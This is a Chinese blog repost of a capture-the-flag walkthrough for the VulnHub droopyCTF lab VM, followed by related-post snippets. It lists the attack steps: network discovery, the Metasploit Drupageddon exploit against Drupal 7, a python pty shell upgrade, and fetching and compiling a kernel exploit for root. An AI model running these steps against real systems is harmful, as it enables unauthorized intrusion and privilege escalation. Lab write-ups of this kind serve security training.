靶机-droopyCTF Walkthrough

最新推荐文章于 2023-06-28 16:25:18 发布
最新推荐文章于 2023-06-28 16:25:18 发布
阅读量228 收藏
点赞数
文章标签: shell php
原文链接:http://www.cnblogs.com/micr067/p/11396123.html
版权
droopyCTF
https://www.vulnhub.com/?q=droopy&sort=date-des&type=vm

提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409
提权辅助工具linuxprivchecker下载:https://download.csdn.net/download/weixin_41082546/11609428

 
1.获取目标ip地址,并进行端口发现,目标只开启了80端口
netdiscover -i eth0 -r 192.168.88.1/24
访问web页面
 
Drupal 7 应该是一个类似于wordpress的一个开源的框架
searchsploit Drupal 7 搜索相关漏洞
使用 msf 利用 漏洞
use exploit/multi/http/drupal_drupageddon
set rhosts 192.168.88.200
exploit
利用注入漏洞上传payload 获得shell
搜索内核相关漏洞信息
使用 pty 获取完整性shell
python -c 'import pty; pty.spawn("/bin/bash")'
开启web,使用 wget 将 漏洞利用代码下载到目标机器
 
编译.c文件,执行漏洞利用程序,成功获得root权限。
 

转载于:https://www.cnblogs.com/micr067/p/11396123.html

banacyo14206
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DROOPYCTF WALKTHROUGH
weixin_41082546的博客
08-11 295
droopyCTF https://www.vulnhub.com/?q=droopy&sort=date-des&type=vm CTF镜像合集:https://www.vulnhub.com/?page=18 参考:https://www.hackingarticles.in/hack-droopy-vm-ctf-challenge/ 1.获取目标ip地址,并进行...
DroppyCtf靶机
小小猪的博客
06-10 317
DroppyCtf靶机 概述: 目标:getflag 下载链接:https://www.vulnhub.com/entry/droopy-v02,143/ 工具:kail linux 1.arp-scan -l 扫描靶机地址 2.nmap -sV -Pn -A x.x.x.234,扫描出80端口 访问80端口,弱口令不成功 nikto -h x.x.x.234 发现robots.txt文件 访问robots.txt文件,发现一下文件 访问/CHANGELOG....
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
ctf出题--docker镜像制作
最新发布
q1415500189的博客
06-28 551
ctf出题docker镜像制作
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
网络攻防靶机-设计概要 V5.docx
09-06
网络攻防靶机-设计概要 V5.docx 网络攻防靶机是指一种可以模拟网络攻击和防御的系统,旨在提高网络安全防御能力。该系统的设计概要包括项目概况、术语与定义、项目来源与参考资料、引用标准和规范、系统总体框架、...
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
靶机-dvwa修改配置版
05-09
靶机-dvwa修改配置版!自行修改config.inc.php中数据库的连接密码进行安装其它相关配置我都设置好了不用修改!
靶机-佛山发发鱼喊access注入
05-09
靶机-佛山发发鱼喊access注入!很多视频教程中使用的靶机!默认含参数过滤,为了方便新人测试我已经去掉了参数过滤!
Droopy, 允许其他人将文件上载到你的计算机上的小型Web服务器.zip
09-17
Droopy, 允许其他人将文件上载到你的计算机上的小型Web服务器 松弛轻松文件共享版权所有 2008 -2013 ( c ) Duquesne stackp@online.fr 在新BSD许可下许可。 最初在的博客上分享,stackp.online.fr 。Droopy是一个独立的最小文件共享服务
使用Python开启局域网传送数据(2):在 Windows 系统使用 droopy 实现仅上传功能
明而决之
03-15 608
droopy模块是Python一个小型的 Web 服务器,可以用来搭建简单医用的文件传输服务,特备是在局域网中,可以直接开启相关的服务。droopy是 Python 的第三方模块,因此需要另外安排相关的库。使用以下命令安装。我查了好些教程,都是教 Mac 和 Linux 系统的操作,包括官方的 GitHub 也是只说怎么进行 Linux 和 Mac 的使用,而 Windows 指向了另外一个链接,一来要翻墙,好不容易探了个头出去,发现链接已失效……
python简单实现文件上传/下载
Antrn
11-24 1万+
如果团队想要共享一个文件夹,可以在服务器上共享文件夹,支持文件上传和下载。 本文主要介绍两种方式。 方法一 本方法主要使用python的http.server和droopy模块实现共享文件夹和文件上传。不用自己写代码,都有现成的,适合我这种懒人。 共享文件夹 两个版本的命令: python2: python -m SimpleHTTPServer 1234 python3: python3 -m http.server 1234 后面数字是自定义端口,1234确保在服务器的控制台打开安全组 后台运行 为
docker搭建简单的ctf题目
网络安全。
12-07 1万+
0x01 docker常用命令 1.拉取镜像。 docker pull [image] 2.查看docker当前镜像。 docker image ls 或 docker images 3.新建一个docker容器,并映射端口号。 docker run -d -p [host port]:[docker port] [image] 4.查看运行中的docker容器。 docker ps...
安装centos7并配置CTF靶场(docker方式)
lifeng_dc的博客
01-27 3205
一、安装CentOS7 (一)下载安装光盘镜像 下载地址:https://www.centos.org/download/ 建议通过阿里云镜像下载,会快很多,地址:https://mirrors.aliyun.com/centos/7.9.2009/isos/x86_64/CentOS-7-x86_64-DVD-2009.iso (二)安装 我是通过虚拟机简易安装,自动安装完成重启后界面如下: 可见语言为英文,时间也不对,按如下方法修改 1.以root用户修改/etc/locale.conf 将英文语
Droopy v0.2 靶机渗透(drupal 7.3版本漏洞)
afei001
08-14 312
目录 练习环境 1.发现靶机,端口扫描 2.网站探测 3.尝试查找drupal7.3版本漏洞 4.尝试MSF的Drupal漏洞拿下shell 5.尝试内核漏洞提权 6.继续探测获取flag 总结 练习环境 攻击机:kali 靶机:Droopy: v0.2 下载地址:https://download.vulnhub.com/droopy/DroopyCTF.ova 1.发现靶机,端口扫描 root@kali:~# netdi...
夺旗赛 CTF 六大方向基础工具简介集合(MISC,WEB,Crypto,Reverse,Pwn,Mobile)
热门推荐
小哈里的博客
01-14 2万+
1、MISC方向 杂项往往是不能被归到其他类别里的题目,所以什么样的题都有,工具也很杂。 主要的分类有: 1、视频音频图片类 Stegsolve.jar 一款图像隐写工具,支持使用不同方式解除图像隐写,是图像隐写的必备工具。可以破解色道隐写等,需要JAVA环境。 QR_Research.exe 用于扫描二维码,有些题目需要自己准备二维码定位角图用p图工具p上去 Audacity.exe 运行于windows的常用音频隐写工具 outguess(linux) 开源隐写算法,支持各种格式的文件,C语言编写 M
docker使用镜像lamp创建自己的ctf平台(一)
xiao白帽子学习之路
01-11 2513
使用docker安装lamp,搭建ctf平台。 docker环境:vm的centos7。 大体步骤: 1.下载lamp镜像。 2.运行配置lamp容器。 3.测试ctf平台是否搭建成功。 一:下载lamp镜像 。 ①:修改docker源(国内某种原因,导致docker的pull镜像缓慢,emmm,非常缓慢) 修改/etc/docker/daemon.json文件 并添加上registry-mirr...
手把手教你如何建立一个支持ctf动态独立靶机的靶场(ctfd+ctfd-whale)
fjh1997的博客
09-15 2万+
手把手教你如何建立一个支持ctf动态独立靶机的靶场 前言 要说开源的ctf训练平台,ctfd是不错的选择,支持各种插件,今天我就来介绍一下如何部署赵今师傅为ctfd平台写的一款支持独立动态靶机的插件。 动态独立靶机 说到独立动态靶机,各位ctfer可能会联想到i春秋举办的各类比赛,其中比赛环境大都用到了动态独立靶机(dynamic standalone instance)技术,也就是每做一道题,就...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值